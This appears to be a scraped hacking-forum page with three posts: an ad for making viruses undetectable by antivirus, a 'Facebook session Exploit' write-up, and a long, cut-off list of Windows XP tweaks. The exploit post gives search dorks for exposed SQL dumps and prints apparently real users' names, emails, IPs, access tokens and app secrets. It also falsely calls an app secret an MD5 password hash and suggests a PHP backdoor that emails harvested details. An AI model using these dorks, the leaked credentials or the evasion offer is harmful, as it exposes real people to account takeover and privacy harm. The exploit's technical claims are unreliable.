cosminkent

Make Your Virus FUD http://3.bp.blogspot.com/-uPZ69RUzR4A/UWZfdLOJ3II/AAAAAAAADEo/7c6lMymrnNw/s640/13047.png Download: ?? ????????????????? ?? ??????? ????? ????????? ? ???? HINT: Daca va place cafeaua Arabica! VT: https://www.virustotal.com/en/file/e3827e7fcc1419c232e2466cb90ce74b64137313e21f1fec14cf0b035d13ab1e/analysis/1368639139/ Source: HA

############################################### #Title: Facebook session Exploit Priv8 #Description : Parameters Logins Facebook #Exploitation: Manually and use your Brain #Date: 12/05/2013 #Author: Mauritania Attacker #Greetz : All AnonGhost Members <3 ############################################### Hi All Today i'm going to Explain about the new Exploit i found in Facebook , This time it's an advanced Exploit i'm going to explain step by step. First , Facebook Token is a Code wich from you can access to another account or view Datas given by your friend , or by an admin of a page or an application. POC : https://graph.facebook.com/303943362983320/accounts/test-users?installed=true&name=test&permissions=read_stream&method=post&access_token=303943362983320|gdHOjhabhCio0zTGiYKDhZcuUo0 So the Token Code is : gdHOjhabhCio0zTGiYKDhZcuUo0 Before the Token Code we have "|" do not forget like you see in the url. The Id of the Application is : 303943362983320 So here is the results as you can see : { "id": "100005941890185", "email": "test_yqvqkrx_test\u0040tfbnw.net", "access_token": "CAAEUb1QutZAgBAKZBAZCw0C5iwP6vcrm6ZARLLuVZCyopLmfGC8ReGrN9jBLt8KcDoybAPJ0qZAZCUZBHFyZCU4xsFT4VvjaCbJisW7dflRZBvroVbeFUJg9PMwFgV0tO83LteqJOCiRGLWXnnsiS0BrPZANGFObF5gmI0ZD", "login_url": "https://www.facebook.com/platform/test_account_login.php?user_id=100005941890185&n=cNdaa9hGgmzmcvi", "password": "147905033" } #We can see the password and the login url but this method is just to get Users of a Facebook Application. #So now let's get inside the serious things Facebook `ci_sessions` is the Log sent by "login.facebook.com" to another servers that are using Facebook Plugins or Modules and it has all parameters of the Logins of Accounts used by Most of the Websites and the best thing is that the Hash password is in MD5 (ascii Text) that mean that it can be decrypted without any problem . #There is Also A second Log called `WRITE` you can try to find another Logs Var , \!/ Hacking is Art of Exploitation \!/ Parameters are : *fb_apiid *fb_apikey *fb_secret (Password of the Account in Hash MD5) *fb_accesstoken *fb_uservisitor *facebook_id *facebook_name *facebook_first_name *facebook_last_name *facebook_link *facebook_username *facebook_hometown (tracer) *facebook_location (tracer) #These are the most Important Parameters of a Facebook account and there is all parameters in the Exploit and also i wanted to show you these two importants Parameters : *facebook_hometown (tracer) *facebook_location (tracer #It shows how can Facebook trace people and where is the locations saved in their Database ,you can even use a php Backdoor Script with that Parameters and you will receive all Details in your email \!/ #So You can see that Facebook has been totally exploited and now i leave you with the Datas so you can be sure that you understand the Exploit. *Example Of Facebook `ci_sessions` : Facebook `ci_sessions` "id\";s:1:\"1\";s:4:\"\";s:9:\"\";s:15:\"\";s:2:\"ar\";s:13:\"\";s:8:\"facebook\";s:8:\"fb_apiid\";s:15:\"223122544391265\";s:9:\"fb_apikey\";s:15:\"223122544391265\";s:9:\"fb_secret\";s:32:\"49c853d3d0718fd0419fd58ac183bbce\";s:3:\"url\";s:29:\"apps.facebook.com/oinstaller/\";s:18:\"status_visit_saved\";b:1;s:14:\"fb_accesstoken\";s:96:\"223122544391265|2.AQCOHzLLEQ5H_PqV.3600.1313622000.0-100001444879309|HrF0TGDVgG51z5Z8plmHNPiTXwA\";s:14:\"fb_uservisitor\";s:15:\"100001444879309\";s:11:\"facebook_id\";s:15:\"100001444879309\";s:13:\"facebook_name\";s:13:\"Owen Peredo D\";s:19:\"facebook_first_name\";s:4:\"Owen\";s:18:\"facebook_last_name\";s:8:\"Peredo D\";s:13:\"facebook_link\";s:34:\"http://www.facebook.com/owenperedo\";s:17:\"facebook_username\";s:10:\"owenperedo\";s:17:\"facebook_hometown\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"106257366076550\";s:4:\"\";s:19:\"Cochabamba, Bolivia\";}s:17:\"facebook_location\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"106257366076550\";s:4:\"\";s:19:\"Cochabamba, Bolivia\";}s:12:\"facebook_bio\";s:21:\"Alegre y divertido!!!\";s:13:\"facebook_work\";a:1:{i:0;O:8:\"stdClass\":5:{s:8:\"employer\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"145505632143902\";s:4:\"\";s:8:\"Sysdecom\";}s:8:\"location\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"106257366076550\";s:4:\"\";s:19:\"Cochabamba, Bolivia\";}s:8:\"position\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"131462966897408\";s:4:\"\";s:19:\"Gerente Propietario\";}s:11:\"description\";s:27:\"Systems development Company\";s:10:\"start_date\";s:7:\"2008-01\";}}s:15:\"facebook_sports\";a:1:{i:0;O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"103998839637434\";s:4:\"\";s:20:\"Association football\";}}s:23:\"facebook_favorite_teams\";a:1:{i:0;O:8:\"stdClass\":2:{s:2:\"id\";s:12:\"197394889304\";s:4:\"\";s:12:\"FC Barcelona\";}}s:26:\"facebook_favorite_athletes\";a:1:{i:0;O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"176063032413299\";s:4:\"\";s:9:\"Leo Messi\";}}s:29:\"facebook_inspirational_people\";a:1:{i:0;O:8:\"stdClass\":2:{s:2:\"id\";s:11:\"19987834992\";s:4:\"\";s:11:\"Hilary Duff\";}}s:18:\"facebook_education\";a:3:{i:0;O:8:\"stdClass\":2:{s:6:\"school\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"106494992721308\";s:4:\"\";s:24:\"joseph nicolas maldonado\";}s:4:\"type\";s:11:\"High School\";}i:1;O:8:\"stdClass\":2:{s:6:\"school\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"106233722748482\";s:4:\"\";s:4:\"UMSS\";}s:4:\"type\";s:7:\"College\";}i:2;O:8:\"stdClass\":3:{s:6:\"school\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"106462112722590\";s:4:\"\";s:30:\"Centro Boliviano Americano CBA\";}s:4:\"year\";O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"201638419856163\";s:4:\"\";s:4:\"2011\";}s:4:\"type\";s:7:\"College\";}}s:15:\"facebook_gender\";s:4:\"male\";s:17:\"facebook_timezone\";i:-4;s:15:\"facebook_locale\";s:5:\"en_US\";s:18:\"facebook_languages\";a:2:{i:0;O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"110343528993409\";s:4:\"\";s:7:\"Spanish\";}i:1;O:8:\"stdClass\":2:{s:2:\"id\";s:15:\"106059522759137\";s:4:\"\";s:7:\"English\";}}s:17:\"facebook_verified\";b:1;s:21:\"facebook_updated_time\";s:24:\"2011-08-10T12:59:54+0000\";s:16:\"campaign_user_id\";s:1:\"5\";s:10:\"fanpage_id\";s:15:\"181056671916971\";s:5:\"liked\";b:1;s:7:\"user_id\";s:15:\"100001444879309\";s:10:\"user_token\";s:96:\"223122544391265|2.AQCOHzLLEQ5H_PqV.3600.1313622000.0-100001444879309|HrF0TGDVgG51z5Z8plmHNPiTXwA\";s:16:\"id_pageinstalled\";s:2:\"63\";s:14:\"isFanpageAdmin\";b:1;}'),('63207e3bb6293317511e1731de110bdc','186.22.142.214','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) App',1318966975,'a:31:{s:2:\"id\";s:1:\"1\";s:4:\"\";s:11:\"Frubis tabs\";s:15:\"\";s:2:\"ar\";s:13:\"\";s:8:\"facebook\";s:8:\"fb_apiid\";s:15:\"245451332140121\";s:9:\"fb_apikey\";s:15:\"245451332140121\";s:9:\"fb_secret\";s:32:\"01baa1f609949c21784fd5736835aad8\";s:3:\"url\";s:29:\"apps.facebook.com/frubistabs/\";s:18:\"status_visit_saved\";b:1;s:14:\"fb_accesstoken\";s:109:\"AAAB6hEsLCh4BAB1FXiROoo3QQ1HvUII6weseWOGxgxxX4u9zdtT82ZAjT9upMPx0fYFSTdaIbt5mnq6ghGHJkPEjOmeo1GOgWZCVnolwZDZD\";s:14:\"fb_uservisitor\";s:9:\"689991521\";s:11:\"facebook_id\";s:9:\"689991521\";s:13:\"facebook_name\";s:14:\"Matias O\'Keefe\";s:19:\"facebook_first_name\";s:6:\"Matias\";s:18:\"facebook_last_name\";s:7:\"O\'Keefe\";s:13:\"facebook_link\";s:37:\"http://www.facebook.com/matias.okeefe\";s:17:\"facebook_username\";s:13:\"matias.okeefe\";s:15:\"facebook_gender\";s:4:\"male\";s:14:\"facebook_email\";s:23:\"matias.okeefe@gmail.com\";s:17:\"facebook_timezone\";i:-3;s:15:\"facebook_locale\";s:5:\"es_LA\";s:17:\"facebook_verified\";b:1;s:21:\"facebook_updated_time\";s:24:\"2011-10-17T12:06:55+0000\";s:16:\"campaign_user_id\";i:7;s:10:\"fanpage_id\";s:15:\"146715982029180\";s:5:\"liked\";b:1;s:7:\"user_id\";s:9:\"689991521\";s:10:\"user_token\";s:109:\"AAAB6hEsLCh4BAB1FXiROoo3QQ1HvUII6weseWOGxgxxX4u9zdtT82ZAjT9upMPx0fYFSTdaIbt5mnq6ghGHJkPEjOmeo1GOgWZCVnolwZDZD\";s:16:\"id_pageinstalled\";N;s:14:\"isFanpageAdmin\";b:0;s:11:\"fanpage_url\";s:60:\"http://www.facebook.com/HeladosChungo?sk=app_245451332140121\";}'),('b20a63bc8a68f130feb7321c58b56d8d','190.244.13.94','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:7.',1318967000,'a:30:{s:2:\"id\";s:1:\"1\";s:4:\"\";s:11:\"Frubis tabs\";s:15:\"\";s:2:\"ar\";s:13:\"\";s:8:\"facebook\";s:8:\"fb_apiid\";s:15:\"245451332140121\";s:9:\"fb_apikey\";s:15:\"245451332140121\";s:9:\"fb_secret\";s:32:\"01baa1f609949c21784fd5736835aad8\";s:3:\"url\";s:29:\"apps.facebook.com/frubistabs/\";s:18:\"status_visit_saved\";b:1;s:14:\"fb_accesstoken\";s:114:\"AAAB6hEsLCh4BADXOQ8vp0cUYZBGYTe9eSHygszNz7ogX0qBFNm2I2JAexwCtdDcQd7pPcX7EUB0XE5K8asIaMDRAFlQ4DiLfpeC9fxsit494Ev5c6\";s:14:\"fb_uservisitor\";s:15:\"100000365619835\";s:11:\"facebook_id\";s:15:\"100000365619835\";s:13:\"facebook_name\";s:13:\"House Gregory\";s:19:\"facebook_first_name\";s:5:\"House\";s:18:\"facebook_last_name\";s:7:\"Gregory\";s:13:\"facebook_link\";s:54:\"http://www.facebook.com/profile.php?id=100000365619835\";s:15:\"facebook_gender\";s:4:\"male\";s:14:\"facebook_email\";s:20:\"sfarsuau@hotmail.com\";s:17:\"facebook_timezone\";i:-3;s:15:\"facebook_locale\";s:5:\"en_US\";s:17:\"facebook_verified\";b:1;s:21:\"facebook_updated_time\";s:24:\"2011-10-06T22:24:58+0000\";s:16:\"campaign_user_id\";i:8;s:10:\"fanpage_id\";s:15:\"146715982029180\";s:5:\"liked\";b:0;s:7:\"user_id\";s:15:\"100000365619835\";s:10:\"user_token\";s:114:\"AAAB6hEsLCh4BADXOQ8vp0cUYZBGYTe9eSHygszNz7ogX0qBFNm2I2JAexwCtdDcQd7pPcX7EUB0XE5K8asIaMDRAFlQ4DiLfpeC9fxsit494Ev5c6\";s:16:\"id_pageinstalled\";N;s:14:\"isFanpageAdmin\";b:0;s:11:\"fanpage_url\";s:60:\"http://www.facebook.com/HeladosChungo?sk=app_245451332140121\";}'),('9f82abf03ee6c9c9c052d306452b72d2','200.125.109.35','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KH',1318967163,'a:19:{s:2:\"id\";s:1:\"1\";s:4:\"\";s:11:\"Frubis tabs\";s:15:\"\";s:2:\"ar\";s:13:\"\";s:8:\"facebook\";s:8:\"fb_apiid\";s:15:\"245451332140121\";s:9:\"fb_apikey\";s:15:\"245451332140121\";s:9:\"fb_secret\";s:32:\"01baa1f609949c21784fd5736835aad8\";s:3:\"url\";s:29:\"apps.facebook.com/frubistabs/\";s:18:\"status_visit_saved\";b:1;s:14:\"fb_accesstoken\";s:0:\"\";s:14:\"fb_uservisitor\";s:0:\"\";s:16:\"campaign_user_id\";s:0:\"\";s:10:\"fanpage_id\";s:15:\"146715982029180\";s:5:\"liked\";b:0;s:7:\"user_id\";s:0:\"\";s:10:\"user_token\";s:0:\"\";s:16:\"id_pageinstalled\";N;s:14:\"isFanpageAdmin\";b:0;s:11:\"fanpage_url\";s:60:\"http://www.facebook.com/HeladosChungo?sk=app_245451332140121\";}'),('bab185c44a703272b8324c3915e14f45','190.16.128.144','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) App',1319156401,'a:30:{s:2:\"id\";s:1:\"1\";s:4:\"\";s:11:\"Frubis tabs\";s:15:\"\";s:2:\"ar\";s:13:\"\";s:8:\"facebook\";s:8:\"fb_apiid\";s:15:\"245451332140121\";s:9:\"fb_apikey\";s:15:\"245451332140121\";s:9:\"fb_secret\";s:32:\"01baa1f609949c21784fd5736835aad8\";s:3:\"url\";s:29:\"apps.facebook.com/frubistabs/\";s:18:\"status_visit_saved\";b:1;s:14:\"fb_accesstoken\";s:119:\"AAAB6hEsLCh4BAID3FIcZB1aYt8df7W853hvRCCPXZB4ktWLUpLyWEpynMQNFZCTjxCvCmOmnLktygK583TNAzeiWgEpAZAlNERYiiQZCftm6kbZCij0vE8\";s:14:\"fb_uservisitor\";s:15:\"100001952113675\";s:11:\"facebook_id\";s:15:\"100001952113675\";s:13:\"facebook_name\";s:11:\"Enzo Sifrub\";s:19:\"facebook_first_name\";s:4:\"Enzo\";s:18:\"facebook_last_name\";s:6:\"Sifrub\";s:13:\"facebook_link\";s:54:\"http://www.facebook.com/profile.php?id=100001952113675\";s:15:\"facebook_gender\";s:4:\"male\";s:14:\"facebook_email\";s:31:\"francisco.valenzuela@frubis.com\";s:17:\"facebook_timezone\";i:-3;s:15:\"facebook_locale\";s:5:\"es_LA\";s:17:\"facebook_verified\";b:1;s:21:\"facebook_updated_time\";s:24:\"2011-10-20T14:53:31+0000\";s:16:\"campaign_user_id\";i:9;s:10:\"fanpage_id\";s:15:\"146715982029180\";s:5:\"liked\";b:1;s:7:\"user_id\";s:15:\"100001952113675\";s:10:\"user_token\";s:119:\"AAAB6hEsLCh4BAID3FIcZB1aYt8df7W853hvRCCPXZB4ktWLUpLyWEpynMQNFZCTjxCvCmOmnLktygK583TNAzeiWgEpAZAlNERYiiQZCftm6kbZCij0vE8\";s:16:\"id_pageinstalled\";N;s:14:\"isFanpageAdmin\";b:0;s:11:\"fanpage_url\";s:60:\"http://www.facebook.com/HeladosChungo?sk=app_245451332140121\";}'),('3a6f810a85da6f7045d88aad108f33f3','190.224.151.198','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KH',1319156419,'a:31:{s:2:\"id\";s:1:\"1\";s:4:\"\";s:11:\"Frubis tabs\";s:15:\"\";s:2:\"ar\";s:13:\"\";s:8:\"facebook\";s:8:\"fb_apiid\";s:15:\"245451332140121\";s:9:\"fb_apikey\";s:15:\"245451332140121\";s:9:\"fb_secret\";s:32:\"01baa1f609949c21784fd5736835aad8\";s:3:\"url\";s:29:\"apps.facebook.com/frubistabs/\";s:18:\"status_visit_saved\";b:1;s:14:\"fb_accesstoken\";s:117:\"AAAB6hEsLCh4BAA8FKmqrg6p8CG0D5FZA8FXwStCsrZBnrEZCVQlbY6BynCZBS1QNyBdD5q3zXwt51WUMYtrUPPAuUXE5epaPFKlXOV6XpQMvNA7a3srP\";s:14:\"fb_uservisitor\";s:10:\"1089777996\";s:11:\"facebook_id\";s:10:\"1089777996\";s:13:\"facebook_name\";s:17:\"Luciano Balmaceda\";s:19:\"facebook_first_name\";s:7:\"Luciano\";s:18:\"facebook_last_name\";s:9:\"Balmaceda\";s:13:\"facebook_link\";s:39:\"http://www.facebook.com/lucho.balmaceda\";s:17:\"facebook_username\";s:15:\"lucho.balmaceda\";s:15:\"facebook_gender\";s:4:\"male\";s:14:\"facebook_email\";s:27:\"lucho.balmaceda@hotmail.com\";s:17:\"facebook_timezone\";i:-3;s:15:\"facebook_locale\";s:5:\"es_LA\";s:17:\"facebook_verified\";b:1;s:21:\"facebook_updated_time\";s:24:\"2011-10-19T14:48:37+0000\";s:16:\"campaign_user_id\";i:10;s:10:\"fanpage_id\";s:15:\"146715982029180\";s:5:\"liked\";b:1;s:7:\"user_id\";s:10:\"1089777996\";s:10:\"user_token\";s:117:\"AAAB6hEsLCh4BAA8FKmqrg6p8CG0D5FZA8FXwStCsrZBnrEZCVQlbY6BynCZBS1QNyBdD5q3zXwt51WUMYtrUPPAuUXE5epaPFKlXOV6XpQMvNA7a3srP\";s:16:\"id_pageinstalled\";N;s:14:\"isFanpageAdmin\";b:0;s:11:\"fanpage_url\";s:60:\"http://www.facebook.com/HeladosChungo?sk=app_245451332140121\";}'); *Example of Facebook `WRITE` session : (6,'fbsecret','823215e0b822191b1451b7f48f877dd5'), (5,'fbapi','ffc4ba57627eebfd1d41ca7d7107123e'), (7,'pageid','188846611127079'), (8,'pagename','St Maria Goretti Church'), (9,'pagetoken','122582234479418|a17360823010b076c960588f-58100826|188846611127079|F7ae3Q3oYkZsu6TwJls-7EZx8PM'), (10,'Cancellations','2'), (11,'Bulletins','3'), (12,'Cancellations/Delays','4'), (13,'Church Blog','') #Dorks that you can use or create your own Dorks Dork1: ext:sql "fb_secret\" Dork2: ext:sql "fb_username\" Dork3: ext:sql "fb_id\" Dork4: ext:sql "fb_secret\" ci_sessions Dork5 : ext:sql "fb_secret\" WRITE #Demo : *User Facebook : facebook_username\";s:10:\"owenperedo ================>>> Username Facebook : www.facebook.com/owenperedo *Pass Facebook : \"fb_secret\";s:32:\"49c853d3d0718fd0419fd58ac183bbce\ ================>>> Password Facebook : 49c853d3d0718fd0419fd58ac183bbce (MD5) #Note that almost of CMS like "Wordpress" , "Joomla" , "Drupal" , etc.. and another Websites has this Bug you can find the Datas in any extensions : "sql" , "xml" , "dat" , "txt" SOURCE: HA

Am gasit cu site cu tweaks-uri pentru Xp (asta cine mai foloseste): Troubleshooting Windows XP, Tweaks and Fixes for Windows XP Edit: Tweaks-urile sunt deja facute cu extensia .vbs si/sau .reg ,doar descarcati si rulati! 1. Add XP TweakUI Icon to the Control Panel Add ControlUserPasswords2 To Control Panel - Remove 2. Increase Folder View Size Limit to 8000 Add Folder to Start Menu - Replace MP or MM 3. Restore Missing Toolbars EXE or VBS Disable CD AutoRun for Home or Pro 4. Repairs the Icon View Set Numlock State On or Off at Startup 5. Restore Safely Remove Hardware Icon Enable/Disable Administrator on Welcome Screen 6. Restore System Default Sounds Fix the Ding.Wav File 7. Increase Balloon Tip Display Time Change Registered Owner and Organization 8. Release/Renew Bat File Remove Internet Explorer Branding 9. Disable the Windows Logo Keys Restore OE to the E-mail List in Internet Options 10. Enable CD AutoPlay for Pro Disable Media Player Update Message 11. Enable/Disable Balloon Tips or Disable All Disable Media Players Play List 12. EXE (lnk and regfile) Fix for Windows XP Link File Fix for Windows XP 13. Disable "No Computers Near Me" Restore IE AutoComplete Password Prompt 14. Uninstall/Reinstall NetMeeting Remove/Disable CD Burning Capability 15. Remove Common Tasks from the Desktop Disable Search Assistant - Undo 16. Active Desktop - Enable or Disable Add Recent Documents to the Classic Menu 17. Restore AutoPlay Icon Restore Thumbnail Views in XP 18. Add Google as Primary Search - Undo Search Opens When Double Clicking A Folder 19. Add Outlook Express as Default Client Correct the Sort Order in Windows XP 20. Restore IE Desktop Shortcut Icon Functions Disable the File Menu in Windows Explorer 21. Disable System Beeps Add Empty Recycle Bin to the Right Click 22. Hide Users on Welcome Screen - Unhide Disable the Security Tab - Hardware Tab 23. Run Startup Programs from the CMD Prompt Allow or Disable CD Burn Options 24. Remove File/Edit/View.... Restore Clear Search History under Search 25. Prompt for Password on Resume - Undo Open With Notepad for Files with No Extension 26. Add Command Line to the Right Click Disable Internet Search for File Extensions 27. Secure Desktop - Undo Remove Set Program Access & Defaults - Undo 28. Control Panel Icons are Missing Windows Update Restriction Error (Network) 29. Run Command - Reinstalling Internet Explorer Disable Getting Started Welcome Screen - Logon 30. Windows XP Doesn't Save User Settings Change Associations from the Run Command 31. Windows XP Startup - Boot Performance Disable Changes Made to the Start Menu - Undo 32. KeepRas Connection (FUS) Exe or Reg Remove the Search Button 33. Remove Toolbars from Taskbar Right Click Remove Users Folder From the Start Menu 34. Restore Fast User Switching Super Fast Switcher PowerToy (Winkey + Q) 35. Creates copies of REGEDIT, MSCONFIG and Task Manager Drive Rescue - Undelete and Data Recovery Tool 36. Recover and Restore Deleted Files User Profile Hive Cleanup Service 37. Clear Form Fields in AutoComplete AutoComplete Mode Enabled or Disabled 38. Set Auto Disconnect Back to Default Remove Added Links from the Tool Menu 39. AutoRuns - All Programs Running Boot/Login Delete an Undeletable File in Windows XP 40. Enhance CMD Quick Edit Options XP Info - Verifies Activation Components 41. Disable the Indexing Service (cisvc.exe) Clear Recent File Lists 42. Hide the Common Dialog Places Bar Remove CD Burning Features - Undo 43. Hide the Display List of Recent Files Hide the Common Dialog Back Button 44. Add Switch User to the Start Button & RC Remove Access to all Windows Update Features 45. Add Copy To/Move To (Right Click) - Undo Restore the Welcome Screen - Gina.Dll Error 46. Content Advisor On (Place in Startup Folder) Content Advisor Off (Place in Startup Folder) 47. Regedit - Save to Favorites Regedit - Clear Last State 48. Disable Windows Installer Rollback Disk Cleanup/All tmp-Compress Old Files Freezes-Undo 49. Old Style Search Engine On or Off Add Toolbar to Outlook Express (OETool) 50. Clear History of Typed URL's Prevent My Documents and Recent Documents 51. ScreenSaver Disable/Enable or Tab Missing Enable the Task Manager - Disable Task Manager 52. Shutdown.Exe - Andrej Budja Add a Website Link to the Start Menu 53. Remove Past Items From Notification Area Hide or Show Inactive Icons - Notification Area 54. Restore Admin Tools (.msc) Save Settings on Exit - Don't Save Settings 55. Restore Recent Documents, My Documents Increase Internet Explorer Downloads to 10 - Undo 56. Remove Files Stored on this Computer Undo Enable or Disable Right Click Context Menu 57. Restore winhlp32.exe for XP or XPSP1 Restore the Run Command 58. Recovery Console Fix for XP SP1 Restore User Default Pictures 59. Disable Messenger in Outlook Express Remove "For Testing Purposes Only" - Desktop 60. Email Page - IE (right click) w/ Clickable Link Correct IE Window Placement (Reg or VBS) 61. Change Provided By in IE Restore/Add Show Desktop to Quick Launch Bar 62. Disable the Desktop Cleanup Wizard - Undo Separate Process for the Desktop and Explorer 63. Home Page Lock - Home Page Unlock Start Page Guard for Internet Explorer 64. Reset OE for Send To , Mail To , Send Mail Replace/Repair the Recycle Bin in Windows XP 65. Disable Low Disk Space Message Search Google Address Bar, Q#'s, MS-KB, TN 66. Error 1606 ... Access Network Location Prevent Programs from Stealing Focus - Undo 67. Run Scheduled Tasks w/o PW Home - Undo Enable Show Status Bar 68. Set Volume Per Program/Application Page Cannot be Found and/or DNS/Server Error 69. Reuse Same Window Internet Explorer-Undo Startup/Shutdown/Logon/Logoff Status Messages 70. Search is Missing from the Start Menu - To remove Clear Recent Documents or Undo 71. Speed up Moving or Copying Zip Files WinFile.Exe 72. Enable/Disable Desktop Icons SendTo Any Folder and SendTo Clipboard 73. Enable or Disable Personalized Menus - Start Enable or Disable Personalized Menus - Favorites 74. AVI Search Remove - Restore Network Places Missing from the Start Menu 75. Search Shows Yellow Triangle with ! MS Windows File Extension Identifier 76. Power Off or Reboot After Shutdown Auto End Tasks to Enable a Proper Shutdown - Undo 77. Disable "Log on using dial-up connection" Uninstall NetMeeting 78. Common Tasks View - Disable or Enable Enable or Disable Winkeys 79. Speedup Browsing (Explorer and IE) Undo Speedup Network Logon/Boot 80. Disable or Restore Picture and Fax Viewer Enable the Welcome Screen 81. Increase Slide Show Timeout Disable Pop-Up Error Messages Upon Boot 82. Disable or Enable Check Disk Upon Boot Change Program File Directory 83. Change File Time Created/Modified/Accessed Properties Missing From My Computer 84. Restore Disk Cleanup (cleanmgr) Windows Installer Logging or Cleanup Utility 85. Set Detail View for all Folders Open/Save As Restore Compressed Zipped Folders Association 86. Taskbar Grouping by # or Least , Most Used Shortcut to Search 87. Dial-up Modem or PPPoE is Unavailable Check E-Mail from Anywhere 88. Set Default Web Browser in Windows Hide Inactive Icons and More 89. Easy Log Off, Shutdown or Lock Find File Information (Name, Version and Path) 90. Expand ReadMe.Txt Zip Files w/o Opening Read Reg, VBS Edits w/o Opening (also File info) 91. Disable or Enable AutoDial Customize Folder Shell Extensions 92. Show Full URL Path links in IE Status Bar Change Online Support Link under IE/Help 93. Logon Using a Dial-Up Connection Prompt Remove Links folder from IE/Favorites - Undo 94. Windows Installer Fix - Winnt for Windows Enable Notepad Status Bar with Word Wrap 95. Disable Messenger Service (Pop-up Spam) Change the Warning Message in Messenger 96. Disable Control/Alt/Delete Add SpellChecker & Button to Internet Explorer 97. Decrease the Size of Taskbar Buttons - Undo Increase the Size of Taskbar Buttons - Undo 98. Enable/Disable LogOff - Classic or New Create Start Up List or Start Up Log 99. Restore the Task Bar to Default Settings Security Hotfix Checker Tool 100. Disable Unread Mail on the Welcome Screen - Undo Check and Open Desktop Paths or MP or MM 101. Prevent IE History Being Removed - Undo Disable Show My Pictures Toolbar in IE 102. Hide System Desktop Icons Hide IE Icon from the Desktop Toolbar 103. Enable Mouse Snap To Option/Function - Undo Save As - Disable: Back, MRU and Places Bar 104. Remote Task Manager Active Registry Monitor 105. Disable Remote Dial-Up Connections Disable "Save As" File History 106. Lock Default Browser Restore Hide Underlined Letters - Keyboard Nav 107. Change the Sort Order back to Pre-XP Restore the Device Manager 108. FavesToGo - Save Favorites Quickly FavOrg - Restore and Save Favorite Icons 109. Change Computer Name Empty Temporary Internet Files on Exit 110. Add Message above User Name & Password Add Dialog Box/Message to Logon and Shutdown 111. Restore Run As - Which user account issue Change the Name of the Start Button 112. Add "Log Folder Contents" to SendTo Menu Show File Information 113. Enable the Task Manager - Disable - Repair BootVis - Performance Trace Visualization Tool 114. Redirect Help and Support to a link of choice - Undo Enable Reinstallation of Internet Explorer or OE 115. Rename/Remove the Recycle Bin Read/Find your Product ID Number 116. Prevent Spyware from Being Installed Show All Hidden Devices in the Device Manager 117. Restore Taskbar and Start Menu Add Trillian to the Tools Menu and Toolbar in IE 118. Change Notification Error Wave File Add Folders to the "Save As" Dialog - Undo 119. Change the Hard Drive Icon Change the Folder Icon &/or Opened Folder Icon 120. Mouse/Left Hand Users Undo - Welcome Screen List My Computer or My Documents or Desktop First 121. Increase Icon Cache Change Icon Wrap to One Line on the Desktop 122. Show All Bitmap Views IE/Windows Update - Change Text or Remove 123. Add Notepad as a Right Click Item Disable Changes to File Associations - Undo 124. Add Explore CD-Rom to Start Button (R/C) Add a Folder to the Start Button - Right Click 125. List Page File Location, Min and Max System Up Time 126. Show Boot Configuration(s) View Log Events by Code or List or Clear 127. Disable Windows File Protection Show Super Hidden File Extensions - Undo 128. Task Bar Lock - Task Bar Unlock Restore Desktop and Screensaver Tabs 129. Restore Folder Options Under Tools Control the F Lock Key Functionality State/Status 130. Add a Folder to My Computer and Desktop Add Clipboard to the Control Panel 131. Disable the Shutdown Command/Enable Change My Computer Name to User Name-Undo 132. Change and/or Add an HTML Editor Disable Searched Word Being Highlighted in Blue 133. Restore Most Frequently Used - Undo Replace AM & PM (Clock) with word of Choice 134. Hide All Notification Area Icons - Undo Hide the Clock in the Notification Area - Undo 135. Clear Read-Only Attributes Restore Accessibility Options to Default Settings 136. Search for All File Types Show IP Address on the Desktop, plus more. 137. Remove "Open With" from Context Menu Disable Stand-by: Per User or Per System 138. New Folder Hotkey - SM, Desktop, Specify Google Search from IE's Right-Click Menu 139. Restore Zip Folders to Default in XP Add to or Modify the "New" Menu Listings 140. Rename Files and Folders En Masse Show Slide Show of Attached Pictures in OE 141. Help, CHM, HH Checker/Fixer Add a Custom Splash Screen for User Logon's 142. Disable the Script Debugger in IE Allow Wallpaper/Background Changes - Disable 143. Enable or Disable the Splash Screen for OE Enable or Disable the Splash Screen for IE 144. Clear Wallpaper Most Frequently Used List Add (OE) Send E-Mail to the Right Click 145. Control Panel - Classic or Category View Clear NetMeeting Call History 146. Retrieve the Class Name for a File Extension Add or Remove Programs Restriction - Undo 147. Add Internet E-mail Message to New Menu Restore My Briefcase to the Desktop - Syncapp.Exe 148. Set All Search Options to Active - Undo Clear Disabled Items from Msconfig Startup & Selective 149. Clear Cache on Reboot Add Taskbar Grouping Options to the Start Menu 150. Add Open New Window to the Right Click Clear Last User on Boot Screen in XP - Undo 151. Rename "Search" on the Start Menu - Undo Set "Search" Advanced Options as Default 152. Rename "Run" on the Start Menu - Undo Rename "Help and Support" on Start Menu-Undo 153. Restore Missing "New" and Text Doc Change Size of Desktop Wallpaper to Suit - Undo 154. Disable Shut Down Per User Remove "All Programs" from Start Menu - Undo 155. Enable/Disable Show Hidden Files/Folders Repair Loss of Internet Access/Certain Web Sites 156. Disable SSPD and UPNP Services - Undo Clear the Run Command MRU List 157. Prevent Automatic Folder and Icon Refresh - Enable Prevent Delay Opening My Computer/Explorer 158. Change the Recycle Bin Icon - Undo Remove Throbber from IE & Explorer - Undo 159. Minimize Any Program to System Tray Add "Show Related Links" to Internet Explorer 160. Enable Monitor Power-off on Logon Screen Disable or Enable Pin to Start Menu - Right Click 161. Hide Start Menu Subfolders - Undo Restore: On Resume, Display Welcome Screen 162. Restore HTML, HTM, URL Thumb View Restore XML Thumbnail View 163. Restore Terminal Services Disable/Enable Caps Lock or the Insert Key 164. Restore Taskbar to Default Functionality Disable or Enable Always Ask Before Opening... 165. Disable/Enable Start Menu Subfolders Disable/Enable Run Keys Per User or Per System 166. Restore/Place Search on the Start Menu Add Icon Cache Size to Folder Options/View 167. Force 